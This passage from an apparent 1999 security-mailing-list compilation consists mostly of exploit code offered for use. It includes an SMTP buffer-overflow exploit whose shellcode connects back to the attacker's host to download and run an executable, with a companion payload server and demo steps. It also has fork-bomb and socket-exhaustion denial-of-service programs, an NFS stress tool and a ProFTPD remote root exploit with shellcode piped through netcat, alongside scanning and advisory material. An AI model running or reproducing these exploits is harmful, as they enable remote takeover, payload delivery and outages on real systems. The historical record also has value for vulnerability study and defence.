0xF7,0xBF,0xFF,0xD0,0x33,0xDB,0x53,0xFF,0xD0,0x90,0xE8,0x03,0xFE,0xFF,0xFF,0x6D,
0x73,0x76,0x63,0x72,0x74,0x2E,0x64,0x6C,0x6C,0x2C,0x77,0x73,0x6F,0x63,0x6B,0x33,
0x32,0x2E,0x64,0x6C,0x6C,0x2C,0x57,0x53,0x41,0x53,0x74,0x61,0x72,0x74,0x75,0x70,
0x2C,0x73,0x6F,0x63,0x6B,0x65,0x74,0x2C,0x63,0x6F,0x6E,0x6E,0x65,0x63,0x74,0x2C,
0x72,0x65,0x63,0x76,0x2C,0x63,0x6C,0x6F,0x73,0x65,0x73,0x6F,0x63,0x6B,0x65,0x74,
0x2C,0x66,0x6F,0x70,0x65,0x6E,0x2C,0x66,0x77,0x72,0x69,0x74,0x65,0x2C,0x66,0x63,
0x6C,0x6F,0x73,0x65,0x2C,0x77,0x62,0x2C,0x78,0x2E,0x65,0x78,0x65,0x2C,0x73,0x79,
0x73,0x74,0x65,0x6D,0x2C,0x65,0x78,0x69,0x74,0x2C,0x2C,0x2C,0x2C,0x00
};
int main(int argc,char *argv[])
{
struct hostent *hs;
struct sockaddr_in cli;
char packetbuf[BUFSIZE+3000],buf[BUFSIZE];
int sockfd,i;
unsigned int ip,port,yourip;
if (argc<3){
printf("usage\n %s VictimHostName YourHostName\n",argv[0]);
exit(1);
}
if ((yourip=inet_addr(argv[2]))==-1){
if ((hs=gethostbyname(argv[2]))==NULL){
printf("Can not resolve specified YourHost.\n");
exit(1);
}
memcpy((caddr_t)&yourip,hs->h_addr,hs->h_length);
}
bzero(&cli, sizeof(cli));
cli.sin_family = AF_INET;
cli.sin_port = htons(SMTP_PORT);
if ((cli.sin_addr.s_addr=inet_addr(argv[1]))==-1){
if ((hs=gethostbyname(argv[1]))==NULL){
printf("Can not resolve specified VictimHost.\n");
exit(1);
}
cli.sin_family = hs->h_addrtype;
memcpy((caddr_t)&cli.sin_addr.s_addr,hs->h_addr,hs->h_length);
}
if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0){
perror("socket"); exit(0);
}
if(connect(sockfd, (struct sockaddr *)&cli, sizeof(cli)) < 0){
perror("connect"); exit(0);
}
while((i=read(sockfd,packetbuf,sizeof(packetbuf))) > 0){
packetbuf[i]=0;
if(strchr(packetbuf,'\n')!=NULL) break;
}
printf("1:%s\n",packetbuf);
memset(buf,0x90,BUFSIZE);
for (i=267;i<271;i++) buf[i]=0x30;
ip=EIP;
buf[RETADR ]=ip&0xff;
buf[RETADR+1]=(ip>>8)&0xff;
buf[RETADR+2]=(ip>>16)&0xff;
buf[RETADR+3]=(ip>>24)&0xff;
buf[JMPADR] =JMPS;
buf[JMPADR+1]=JMPOFS;
port=7000;
exploit_code[0xc3]=(port>>8) & 0xff;
exploit_code[0xc4]=port & 0xff;
ip=htonl(yourip);
exploit_code[0xc8]=(ip>>24) & 0xff;
exploit_code[0xc9]=(ip>>16) & 0xff;
exploit_code[0xca]=(ip>>8) & 0xff;
exploit_code[0xcb]=ip & 0xff;
memcpy(buf+RETADR+4,exploit_code,strlen(exploit_code));
buf[BUFSIZE]=0;
sprintf(packetbuf,"helo penguin\r\n");
write(sockfd,packetbuf,strlen(packetbuf));
while((i=read(sockfd,packetbuf,sizeof(packetbuf))) > 0){
packetbuf[i]=0;
if(strchr(packetbuf,'\n')!=NULL) break;
}
printf("%s\n",packetbuf);
sprintf(packetbuf,"MAIL FROM: %s\r\n",buf);
write(sockfd,packetbuf,strlen(packetbuf));
close(sockfd);
}
Prog.2
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <errno.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#define PORT_NUM 7000
#define BUFSIZE 1000
#define SENDFILE "test.exe"
int get_connection(port, listener)
int port;
int *listener;
{
struct sockaddr_in address,acc;
int listening_socket,connected_socket;
int reuse_addr=1,acclen=sizeof(acc);
memset((char *) &address, 0, sizeof(address));
address.sin_family = AF_INET;
address.sin_port = htons(port);
address.sin_addr.s_addr = htonl(INADDR_ANY);
listening_socket = socket(AF_INET, SOCK_STREAM, 0);
if (listening_socket < 0) {
perror("socket"); exit(1);
}
if (listener != NULL) *listener = listening_socket;
setsockopt(listening_socket,SOL_SOCKET,SO_REUSEADDR,
(void *)&reuse_addr,sizeof(reuse_addr));
if (bind(listening_socket,(struct sockaddr *)&address,
sizeof(address))<0){
perror("bind"); exit(1);
}
listen(listening_socket, 5);
connected_socket=accept(listening_socket,
(struct sockaddr *)&acc,&acclen);
return connected_socket;
}
int main(argc, argv)
int argc;
char *argv[];
{
int sock,listensock,i,r,l;
char buf[BUFSIZE];
struct stat st;
FILE *fp;
if ((fp=fopen(SENDFILE,"rb"))==NULL){
printf("File not found \"%s\"\n",SENDFILE);
exit(1);
}
stat(SENDFILE,&st);
r=st.st_size/BUFSIZE+1;
sock = get_connection(PORT_NUM, &listensock);
for (i=0;;i++){
l=fread(buf,1,BUFSIZE,fp);
if (l<=0) break;
write(sock,buf,l);
}
fclose(fp);
close(sock);
}
<< Demonstration >>
Victim host : 192.168.200.200
Your host : 192.168.100.100
(1) copy your testprogram "test.exe" to UNIX machine.
(2) gcc ex_pms1.c -o pms1
(3) gcc sendexp.c -o sendexp
(4) ./sendexp &
(5) ./pms1 192.168.200.200 192.168.100.100
You can send "test.exe" to victim host, and can execute it remotely.
The size of "test.exe" is not limited.
-----
The Shadow Penguin Security (http://shadowpenguin.backsection.net)
Webmaster / UNYUN (shadowpenguin@backsection.net)
@HWA
58.0 NetBSD 1.4.1 local DoS
~~~~~~~~~~~~~~~~~~~~~~
Subject: Re: NetBSD 1.4.1 local DoS
To: BUGTRAQ@SECURITYFOCUS.COM
This does not `freeze' the system per se. What it does is tie up all
the network resources, and make it impossible to any network I/O (even
through Un*x-domain sockets).
Linux is not generally vulnerable to the exploit as posted, because it
seems to only accept 64512 bytes from the write(2)s, and limit the
file descriptor table to 256 entries (at least by default), thus
making the program chew up less memory. However, a trivial variant
(attached below) causes memory exhaustion on the Linux system I
tested. Interestingly, this did not cause the Linux system to crash,
but it does cause a bunch of processes to be killed -- gpm, klogd,
update, crond, and finally the test program itself. So there is still
a denial of service, especially if the program is modified to
continually fork as well (also attached below, although it could be
done a bit better).
-----8<-----snip-----8<-----snip-----8<-----snip-----8<-----snip-----8<-----
#include <unistd.h>
#include <sys/socket.h>
#include <fcntl.h>
#define NPROCS 20
#define BUFFERSIZE 204800
extern int
main(void)
{
int p[2], i;
char crap[BUFFERSIZE];
for (i = 0; i < NPROCS - 1; i++) {
if (fork())
break;
}
sleep(5);
while (1)
{
if (socketpair(AF_UNIX, SOCK_STREAM, 0, p) == -1)
break;
i = BUFFERSIZE;
setsockopt(p[0], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int));
setsockopt(p[0], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int));
setsockopt(p[1], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int));
setsockopt(p[1], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int));
fcntl(p[0], F_SETFL, O_NONBLOCK);
fcntl(p[1], F_SETFL, O_NONBLOCK);
write(p[0], crap, BUFFERSIZE);
write(p[1], crap, BUFFERSIZE);
}
pause();
return (0);
}
-----8<-----snip-----8<-----snip-----8<-----snip-----8<-----snip-----8<-----
#include <unistd.h>
#include <sys/socket.h>
#include <fcntl.h>
#define BUFFERSIZE 204800
extern int
main(void)
{
int p[2], i;
char crap[BUFFERSIZE];
while (1)
{
fork();
if (socketpair(AF_UNIX, SOCK_STREAM, 0, p) == -1)
break;
i = BUFFERSIZE;
setsockopt(p[0], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int));
setsockopt(p[0], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int));
setsockopt(p[1], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int));
setsockopt(p[1], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int));
fcntl(p[0], F_SETFL, O_NONBLOCK);
fcntl(p[1], F_SETFL, O_NONBLOCK);
write(p[0], crap, BUFFERSIZE);
write(p[1], crap, BUFFERSIZE);
}
pause();
return (0);
}
-----8<-----snip-----8<-----snip-----8<-----snip-----8<-----snip-----8<-----
@HWA
59.0 Netscape communicator 4.06J, 4.5J-4.6J, 4.61e Buffer Overflow
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Subject: Re: Netscape communicator 4.06J, 4.5J-4.6J, 4.61e Buffer Overflow
To: BUGTRAQ@SECURITYFOCUS.COM
Hello
David Parker$B!!(Bwrites:
> I tried the 4 exploit test links, and they all crashed Netscape but
> didn't cause any bluescreens or run any programs. I have win98,
> Netscape 4.5 128-bit, and the same msvcrt.dll (6.00.8397). I'm not
> sure how to debug the crashes, so I'm including the illegal operation
> errors, hopefully they will be of some help:
We could confirm that the exploit codes which were published at the demo
site were executed. We think that the reason you can not confirm the
executed the exploit codes is based on the difference of the Windows
kernel code. The exploit code which is posted by R00tZer0 is for
Japanese Windows98, this exploit uses the codes which is written in
0xbff7a06b. In case Japanese Windows98, JMP EBX(FFH,E3H) code is written
in such address. If you remake the exploit code that can exploit the
specified netscape communicators, you have to change the address which
is specified in the exploit code. We don't have the environment of the
English Windows, we could not code for English Windows. Maybe, you will
be able to get the address of JMP EBX code by the following program. So,
if someone succeeded or could get the address which is written the JMP
EBX code, please tell us the address of JMP EBX code.
#include <windows.h>
#include <stdio.h>
unsigned int mems[]={
0xbfb70000,0xbfbfc000,
0xbfde0000,0xbfde6000,
0xbfdf0000,0xbfdf5000,
0xbfe00000,0xbfe10000,
0xbfe30000,0xbfe43000,
0xbfe80000,0xbfe86000,
0xbfe90000,0xbfe96000,
0xbfea0000,0xbfeb0000,
0xbfee0000,0xbfee5000,
0xbff20000,0xbff47000,
0xbff50000,0xbff61000,
0xbff70000,0xbffc6000,
0xbffc9000,0xbffe3000,
0,0};
void search_mem(FILE *fp,unsigned char *st,unsigned char *ed,
unsigned char c1,unsigned char c2)
{
unsigned char *p;
fprintf(fp,"Result : %x - %x\n",(unsigned int)st,(unsigned int)ed);
for (p=st;p<ed;p++)
if (*p==c1 && *(p+1)==c2)
fprintf(fp,"%x : %x %x %x %x\n",p,*p&255,*(p+1)&255,*(p+2)&255,*(p+3)&255);
}
int APIENTRY WinMain( HINSTANCE hInstance, HINSTANCE hPrevInstance,
LPTSTR lpCmdLine, int nCmdShow)
{
FILE *fp;
int i;
if ((fp=fopen("adr.txt","w"))!=NULL){
for (i=0;;i+=2){
if (mems[i]==0) break;
search_mem(fp,(unsigned char *)mems[i],(unsigned char *)mems[i+1],0xff,0xe3);
}
fclose(fp);
}
return 0;
}
Kerb$B!!(Bwrites:
> When I went there with NC 4.05, it gave me a blue screen of death that was
> completely unrecoverable. I had to reboot the system.
> So, basically, it is a DoS for Netscape users, could possibly be coded
> into a CGI or Javascript that checks browser
> version and writes the corresponding exploit code. Just a thought.
The CGIs which are published at the demo site are not for DoS attack. Of
course, we could develop the codes for the DoS attack. We also could
develop the HDD format code, virus code, trojan code, and so on. If the
trojan code is written in the exploit code, the all visitors' PC will
be cracked, and if the hdd format code is written, the visitors' HDD
will be cleaned completely. It's very serious problem. In this case, the
stack area that can be used for exploit code is wide enough.
I will post the demo programs which can send the trojan by using the
security hole on other applications.
-----
The Shadow Penguin Security (http://shadowpenguin.backsection.net)
Webmaster / UNYUN (shadowpenguin@backsection.net)
@HWA
60.0 FreeBSD NFS Exploit
~~~~~~~~~~~~~~~~~~~
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/wait.h>
#include <fcntl.h>
#include <unistd.h>
#include <stdlib.h>
#include <signal.h>
#include <stdio.h>
#include <sys/time.h>
#include <time.h>
void usr1() {
}
int main(int argc, char ** argv) {
int nbfils;
int nbopen;
int tbloc;
int tfichier;
char filename[512];
int i, j, k, f;
int pid;
struct timeval start;
struct timeval end;
float delay;
void * bloc;
if (argc<6) {
fprintf(stderr, "Syntax: %s rep_nfs/ nb_child nb_open sizefile(Kb) blocksize(kb).\n", argv[0]);
fprintf(stderr, "ie: %s /TEST/ 120 200 20000 100\n");
exit(EXIT_FAILURE);
}
nbfils = atoi(argv[2]);
nbopen = atoi(argv[3]);
tfichier = atoi(argv[4]);
tbloc = atoi(argv[5]);
bloc = malloc(tbloc * 1024);
memset(bloc, 0, tbloc * 1024);
if (!bloc) {
fprintf(stderr, "%s: ", argv[0]);
perror("malloc");
exit(-1);
}
fprintf(stderr, "forking %d times...\n", nbfils);
signal(SIGUSR1, &usr1);
j = 0;
for(i=0;i<nbfils;i++) {
pid = fork();
if (pid<0) {
perror("fork");
break;
} else
j++;
if (!pid) break;
}
if (!pid) {
pause();
pid = getpid();
srand(pid*10);
fprintf(stderr, "[%d] child %d: Here I go!\n", pid, i);
sprintf(filename, "%s%d", argv[1], pid);
for(i=0;i<nbopen;i++) {
f = open(filename, O_CREAT|O_RDWR, 0666);
if (f<0) {
fprintf(stderr, "[%d] file %s ", pid, filename);
perror("open");
break;
}
k = (rand() % (tfichier * 1024));
j = lseek(f, k, SEEK_SET);
if (j!=k) {
fprintf(stderr, "[%d] ", pid);
perror("lseek");
break;
}
// read(f, bloc, tbloc*1024);
if (write(f, bloc, tbloc*1024)!=tbloc*1024) {
fprintf(stderr, "[%d] ", pid);
perror("write");
break;
}
sync();
if (close(f)) {
fprintf(stderr, "[%d] ", pid);
perror("close");
break;
}
}
exit(0);
}
sleep(2);
gettimeofday(&start, NULL);
kill(0, SIGUSR1);
i = 0;
while (i<nbfils)
if (waitpid(-1, NULL, 0)>0)
i++;
fprintf(stderr, "they're all dead now, exiting.\nYour system is not vulnerable\n");
gettimeofday(&end, NULL);
delay = end.tv_sec - start.tv_sec + ((float) (end.tv_usec - start.tv_usec))
/ (float) 1000000;
i = nbopen * tbloc * nbfils;
exit(0);
}
@HWA
61.0 Using Nmap for RPC vulnerability
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Subject: Re: CERT Summary CS-99-03
To: BUGTRAQ@SECURITYFOCUS.COM
>From the CERT Summary released yesterday:
> 1. RPC Vulnerabilities
> We have received many reports of exploitations involving three RPC
> vulnerabilties. Such exploitations can lead to root compromise on
> systems that implement these RPC services.
> 3. Continued Widespread Scans
> We are still receiving daily reports of intruders using tools to
> scan networks for multiple vulnerabilities. Intruder scanning
> tools continue to become more sophisticated,
Unfortunately, it is often difficult for admins to scan their networks for
vulnerable RPC services since you never know for sure what ports they
will be listening on. Thus I have released a version of Nmap that will
query open TCP and UDP ports to determine whether they are RPC as well as
their program name, number and version(s). This allows you to map all the
RPC services on a given network and then upgrade or eliminate the
exploitable ones. Of course you can obtain the same info from 'rpcinfo
-p', but portmapper is often unavailable due to firewalls or IP
restrictions (libwrap). Further, it can be painful to locate and
'rpcinfo' every host on a large network. And there are occasional cases
where a vulnerable service could be running but not registered. In
addition, rpcinfo won't give you the OS type, which is important in
determining whether a machine is vulnerable.
Nmap is available at http://www.insecure.org/nmap/ and compiles/runs
on most common UNIX platforms. The latest version also contains many more
OS fingerprints, speed optimizations, bug fixes, etc.
Here is a quick example of how to use the new RPC functionality
against a stock Solaris 7 box:
amy# ./nmap -sRUS -p 7,9,13,19,21,23,25,37,42,79,111,32760-32785 xanadu
Starting nmap V. 2.3BETA1 by Fyodor (fyodor@dhp.com,www.insecure.org/nmap/)
Interesting ports on xanadu.yuma.net (192.168.0.10):
Port State Protocol Service (RPC)
7 open udp echo (Non-RPC)
7 open tcp echo (Non-RPC)
9 open udp discard (Non-RPC)
9 open tcp discard (Non-RPC)
13 open udp daytime (Non-RPC)
13 open tcp daytime (Non-RPC)
19 open udp chargen (Non-RPC)
19 open tcp chargen (Non-RPC)
21 open tcp ftp (Non-RPC)
23 open tcp telnet (Non-RPC)
25 open tcp smtp (Non-RPC)
37 open udp time (Non-RPC)
37 open tcp time (Non-RPC)
42 open udp nameserver (Non-RPC)
79 open tcp finger (Non-RPC)
111 open udp sunrpc (portmapper V2-4)
111 open tcp sunrpc (portmapper V2-4)
32771 open udp (Non-RPC)
32771 open tcp (status V1)
32772 open udp (status V1)
32772 open tcp (Non-RPC)
32773 open udp (sadmind V10)
32773 open tcp (ttdbserverd V1)
32774 open udp (rquotad V1)
32774 open tcp (Non-RPC)
32775 open udp (rusersd V2-3)
32775 open tcp (cachefsd V1)
32776 open udp (sprayd V1)
32776 open tcp (Non-RPC)
32777 open udp (walld V1)
32777 open tcp (cmsd V2-5)
32778 open udp (rstatd V2-4)
32779 open udp (cmsd V2-5)
Nmap run completed -- 1 IP address (1 host up) scanned in 30 seconds
amy#
Cheers,
Fyodor
--
Fyodor 'finger pgp@pgp.insecure.org | pgp -fka'
"The percentage of users running Windows NT Workstation 4.0 whose PCs
stopped working more than once a month was less than half that of Windows
95 users."-- microsoft.com/ntworkstation/overview/Reliability/Highest.asp
@HWA
62.0 Clarification of the Nmap/Cisco DoS problem
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From: "Lancashire, Andrew" <LancashireA@sutterhealth.org>
This is to clarify what is being put out by Cisco and what we are being told
by Cisco.
Two e-mails below is what Cisco is telling us and makes alot more sense
than what Cisco is telling Bugtraq. The last post to Bugtraq made mention
that the arp cache was filling up and allocating memory for both reachable
hosts and unreachable hosts (incompletes). Although what Lisa describes is
true regarding the arp cache, it would not be true for our or most other
sane persons environment. Since routers will only arp for what is local,
that would mean that for the arp cache to fill up and us all the memory all
networks in the 10.x.x.x range would need to be local. So that's not gonna
happen but if you read the e-mail below that from Kenny (also at Cisco ) his
explanation makes allot more sense considering we have hundreds of routers.
Thank You
Andrew
P.S. Congratulations on the re-opening of PacketStorm
___________________________________
Subject: Re: Cisco and Nmap Dos
To: BUGTRAQ@SECURITYFOCUS.COM
Hi all,
I wanted to address the items listed here. We are still investigating this
problem, and hope to have more information later on in the week.
Item 1, OSPF is not an issue. According to the configuration information
provided to us by the customer, OSPF is not in use.
Items 2, 3 & 4. IOS actually handles ARP in the following manner:
When we receive a packet destined for something not already in our ARP
table, we enter an "incomplete" entry in the ARP table. Then we will rate
limit ARPs to once every 2 seconds to that destination. Any additional
packets to that same destination will be dropped until the ARP entry is
completed. This is on a per destination basis.
"Incompletes" (ARP requests that have not been responded to) get dropped
after approximately 1 minute from the last time we sent an ARP request for
that non existent address.
Incomplete entries MAY stay around longer, as the process that is
responsible for cleaning up the ARP table may not have enough time to
complete before it is called again, if we have a lot to clean up, which may
be relevant to this case. The incomplete entries will eventually get
cleaned up, but it may take two or three minutes, two or three cycles of the
process that cleans up the table.
Under a dedicated, intense nmap scan, a very large number of ARP requests
may be generated, causing the ARP table to grow very large with "incomplete"
entries. These entries consume memory. As the amount of free memory
declines and demand on the processor to handle outstanding packets
increases, ARP processing falls behind and throughput on the router may
decline significantly. Once the scan is stopped, processing catches up and
things return to normal.
So, to my knowledge IOS should be doing the right thing, we only queue one
ARP request at a time, every 2 seconds, until the ARP entry is resolved, we
rate limit requests, dropping all additional packets, until the ARP entry is
resolved, and we clean up the outstanding incomplete requests within a few
minutes.
I hope that helps address some of the concerns put forth. Hopefully we will
have further updates shortly.
Thank you,
Lisa Napier
Product Security Incident Response Team
Cisco Systems
___________
_______________
-----Original Message-----
From: khollis [SMTP:khollis@cisco.com]
Sent: Wednesday, September 15, 1999 11:31 AM
To: wescotd@sutterhealth.org
Subject: Regarding Case Number V44290
Hello Dave, I've done some testing here with Nmap. I was able to create a
test bed that can cause problems & symptoms similar to those you reported.
But in summary, the router is functioning normally & depending on the
network topology the behavior you experienced would be expected.
>From show processor memory, the ip input process is the process that
maintains the ip fast switching cache. This fast switching cache is used
when forwarding packets to avoid interrupting the cpu for repetitive route
table lookups. The key issue is the behavior of the fast cache and the way
it gets built.
There are a number of scenarios that will cause the fast cache to install an
entry that essentially looks like a host route. For instance, with only 1
path to a destination, we will install an entry into the fast cache that
covers the entire network. Example: 100.0.0.0/8. However, when multiple
equal cost paths to a destination exist, we will install an entry into the
fast cache for each destination. Example: 100.0.0.1/32, 100.1.1.1/32,
100.2.2.2/32...and so on. This helps ensure load balancing. Additionally,
depending on whether routes are directly connected, and/or subnetted, or the
next hop of a static route, the results can vary.
When running Nmap & scanning every address in a class A ip network, if
conditions warrant the installation of a /32 entry into the fast cache this
would allow the fast cache to consume a tremendous amount of memory and in
that scenario all available dram could be consumed. This creates additional
problems because there isn't enough memory to support other features on the
router.
Since Nmap isn't a normal application ran on networks, this issue isn't a
concern in most networking environments. However, if this is a major concern
you could run CEF (Cisco Express Forwarding). The behavior I just explained
does not occur when running CEF. But you will need to run 12.0 on the Cat5
RSM. Other workarounds such as disabling fast switching (no ip route-cache)
or using max-paths 1 aren't really feasible. CEF is the better solution.
Thanks,
KennyH.
_________________
@HWA
63.0 19 SCO 5.0.5+Skunware98 buffer overflows
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Subject: 19 SCO 5.0.5+Skunware98 buffer overflows
To: BUGTRAQ@SECURITYFOCUS.COM
Greetings,
After some light security auditing ;) I've found approximately nineteen buffer overflows in various SCO 5.0.5+Skunkware98 programs. This was, by no means, a comprehensive audit of SCO's su/gids so I'm sure there are dozens of holes I've missed. Keep in mind also that this was ONLY command line buffer overflow testing and did not include environment, file i/o, or any other sort of overflow. And I didn't touch /tmp races. That said..
Some of these holes are old to the world of security, but apparently SCO hasn't caught up yet. For instance, anyone remember the old Xt library holes in xterm and such? Well, apparently SCO doesn't. Not to mention the fact that in June someone posted an xterm exploit (though the author didn't make clear that all programs using the Xt library were probably vulnerable) and SCO never came out with a fix. Thus this program as well as all others in the class are still vulnerable. Following is a list of vulnerable programs and their su/gid status:
Potential root:
SUID root
---
1. xload -bg $1492bytes
2. xterm -bg $1492bytes
3. xmcd -bg $1492bytes
SUID auth (Auth has rw access to /etc/shadow)
---
4. xlock -bg $1492bytes
5. xscreensaver -bg $1492bytes
6. scolock -bg $1492bytes
SUID mem (strings /dev/kmem)
--
7. sar -o $2105bytes or sar -f $1077bytes x
Potential lp:
SUID lp
--
8. cancel $998bytes (isn't this one old too?)
9. lp $10000bytes (didn't get the exact number)
10. reject $10000bytes (as above)
Potential bin:
SUID bin
---
11. sd $1017bytes (SIGSEGV @1017 SIGTERM 1 to 1017bytes)
Potential annoyance:
SUID dos
---
12. doscat $19031bytes
13. doscp "" x
14. dosdir ""
15. dosls ""
16. dosmkdir ""
17. dosrm ""
18. dosrmdir ""
SUID uucp
---
19. ati $40bytes
FIX:
For most of these programs, you're going to have to suffer with some broken functionality when you remove the s-bits. The various suid root and auth won't be able to function without their su/gid status. However you could make a new group such as xusers and have these programs only executable by its members. In fact adding trusted users to the lp group is probably the best way to overcome these lp vulnerabilities as well.
Hopefully this advisory will scare SCO into doing some security auditing on their own before their buggy product hits the market. In any case, be wary.
Brock Tellier
UNIX Systems Administrator
Webley Systems
www.webley.com
@HWA
64.0 SDI anonymous remote exploit for proftpd
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Subject: SDI anonymous remote exploit for proftpd
To: BUGTRAQ@SECURITYFOCUS.COM
Hello,
I've seen some discussion about the possibility of exploit the newest
proftpd vulnerability without having the permission to write (STOR). Here
is the proof. Unlikely the last published exploit, this one does not have
tricks like buggy NOP code or something (to avoid script kiddies).
/*
* SDI linux remote exploit for ProFTPDpre[1,2,3]
* Sekure SDI - Brazilian Information Security Team
* by c0nd0r <condor@sekure.org> - Sep/99 (tudo na paz!)
*
* Exploit for the ProFTPD log_xfer() buffer overflow -- it will spawn a
* shell owned by root.
*
* HOWTO: unlikely the other recent FTP vulnerability, this one doesn't
* need a writeable directory. You just got to have permission to
* download a file (like welcome.msg or README). Don't forget to install
* our favorite network tool -- NetCat.
*
* Greets: jamez, bishop, bahamas, stderr, dumped, paranoia, marty(nordo),
* vader, fcon, slide, corb, Soft Distortion and specially to
* my sasazita! Also lots of thanks to toxyn.org,
* pulhas.org, phibernet, superbofh(seti) and el8.org (duke).
* #uground (brasnet), #sdi(efnet), #(phibernet).
*
* usage: SDIpro -p <your ip> [-f <file>] [-a <align>] [-o <offset>]
* where <your ip> is your ip separated with commas (127,0,0,1)
* <file> is the remote file to download
* example: (./SDIpro -p 27,1,1,4 -a 2;cat) | nc www.victim.com 21
*
* Values: Redhat (alignment 2 - offset 0)
* Slack (alignment 0 - offset -300)
*
* Warning: We take no responsability for the consequences on using this
* tool. DO NOT USE FOR ILICIT ACTIVITIES!
*
* Agradecimentos a todo o pessoal que vem acompanhando a lista brasileira
* de seguranca - BOS-BR <bos-br-request@sekure.org>.
* http://www.securenet.com.br - novo portal de seguranca brasileiro.
*/
char shellcode[] =
"\x31\xdb\x89\xd8\xb0\x17\xcd\x80\xeb\x66\x5e\x89\xf3\x80\xc3\x0f\x39"
"\xf3\x7c\x07\x80\x2b\x02\xfe\xcb\xeb\xf5\x31\xc0\x88\x46\x01\x88\x46"
"\x08\x88\x46\x10\x8d\x5e\x07\xb0\x0c\xcd\x80\x8d\x1e\x31\xc9\xb0\x27"
"\xcd\x80\x31\xc0\xb0\x3d\xcd\x80\x31\xc0\x8d\x5e\x02\xb0\x0c\xcd\x80"
"\x31\xc0\x88\x46\x03\x8d\x5e\x02\xb0\x3d\xcd\x80\x89\xf3\x80\xc3\x09"
"\x89\x5b\x08\x31\xc0\x88\x43\x07\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d"
"\x53\x0c\xcd\x80\x31\xc0\xfe\xc0\xcd\x80\xe8\x95\xff\xff\xff\xff\xff"
"\xff\x43\x43\x30\x30\x31\x30\x30\x31\x43\x31\x64\x6b\x70\x31\x75\x6a";
#include <stdio.h>
#include <unistd.h>
#define TOTAL 940
int fork_port ( void);
int usage ( char *arg) {
printf ( "SDI remote ProFTPD exploit\n");
printf ( "usage: %s -p <local ip> -f <file > [-a <align>] [-o <offset>]\n", arg);
printf ( "where <local ip> is your ip separated with comma (e.g.200,30,1,20)\n");
printf ( " <file> is any remote file available to download (eg. welcome.msg)\n");
printf ( "\nvalues: RedHAT - alignment 2 / offset 0\n");
printf ( " Slack - alignment 0 / offset -300/-200\n");
exit ( 0);
}
main ( int argc, char *argv[] ) {
char buf[2000], port[200], file[150], *pasv=NULL, *ff;
int x, y=0, offset=0, align=0, c, damn=0;
long addr=0xbffff450;
while ((c = getopt(argc, argv, "a:o:p:f:h")) != -1)
switch (c) {
case 'a':
align = atoi ( optarg);
break;
case 'o':
offset = atoi ( optarg);
break;
case 'p':
pasv = optarg;
break;
case 'f':
ff = optarg;
break;
case 'h':
damn = 1;
break;
default:
damn = 1;
break;
}
if (damn==1) usage ( argv[0]);
if (pasv) snprintf ( port, sizeof(port), "%s,5,220", pasv);
else usage ( argv[0]);
if (ff) snprintf ( file, sizeof(file), "%s", ff);
else strcpy ( file, "welcome.msg");
if ( fork() == 0) fork_port();
addr += offset;
fprintf ( stderr, "\nALIGN %d (use alignment 2 for RedHAT)\n", align);
fprintf ( stderr, "OFFset %d\n", offset);
fprintf ( stderr, "RET 0x%x\n", addr);
fprintf ( stderr, "RETR %s\n\n", file);
for ( x = 0; x < ((TOTAL+align)-strlen(shellcode)); x++)
buf[x] = 0x90;
for ( ; y < strlen(shellcode); y++, x++)
buf[x] = shellcode[y];
for ( ; x < 1016; x+=5) {
buf[x ] = (addr & 0x000000ff);
buf[x+1] = (addr & 0x0000ff00) >> 8;
buf[x+2] = (addr & 0x00ff0000) >> 16;
buf[x+3] = (addr & 0x00ff0000) >> 16;
buf[x+4] = (addr & 0xff000000) >> 24;
}
printf( "USER ftp\n");
sleep(1);
printf ( "PASS %s\n", buf);
sleep(1);
printf ( "PORT %s\n", port);
sleep(1);
printf( "RETR %s\n", file);
sleep(1);
}
#include <netinet/in.h>
#include <netdb.h>
#include <sys/types.h>
#include <sys/socket.h>
int fork_port ( void) {
struct sockaddr_in sa;
struct sockaddr_in ca;
int sd, cd, lx, len=0, n=0;
char outbuf[5000];
bzero ( &sa, sizeof(sa));
sa.sin_family = AF_INET;
sa.sin_port = htons(1500);
sd = socket ( AF_INET, SOCK_STREAM, 0);
lx = bind ( sd, (struct sockaddr *) &sa, sizeof(sa));
if (lx<0) {
perror("bind"); exit(0);
}
lx = listen ( sd, 5);
if (lx<0) {
perror("listen"); exit(0);
}
// fprintf ( stderr, "waiting for the incoming file\n");
len = sizeof(ca);
cd = accept ( sd, (struct sockaddr *) &ca, &len);
if ( cd <= 0) { perror("accept"); return(0); }
while ( (n = read ( cd, outbuf, sizeof(outbuf))) > 0)
// fprintf ( stderr, "=> %s\n", outbuf); /*only for debugging*/
if ( n > 0) fprintf ( stderr, "file received\n");
close ( sd);
close ( cd);
sleep(1);
printf ( "uname -a; id;\n");
exit(0);
}
-------------------------
-condor
www.sekure.org
s e k u r e
pgp key available at: http://condor.sekure.org/condor.asc
@HWA
65.0 KKIS19990914.004b: ShareDream - shared memory - ipc vulnerability
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Subject: KKIS19990914.004b: ShareDream - shared memory - ipc vulnerability
To: BUGTRAQ@SECURITYFOCUS.COM
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~
### ### ### ### ###
### ### ### ### ###
###### ###### ###
### ### ### ### ###
### ### ### ### ###
S E C U R I T Y
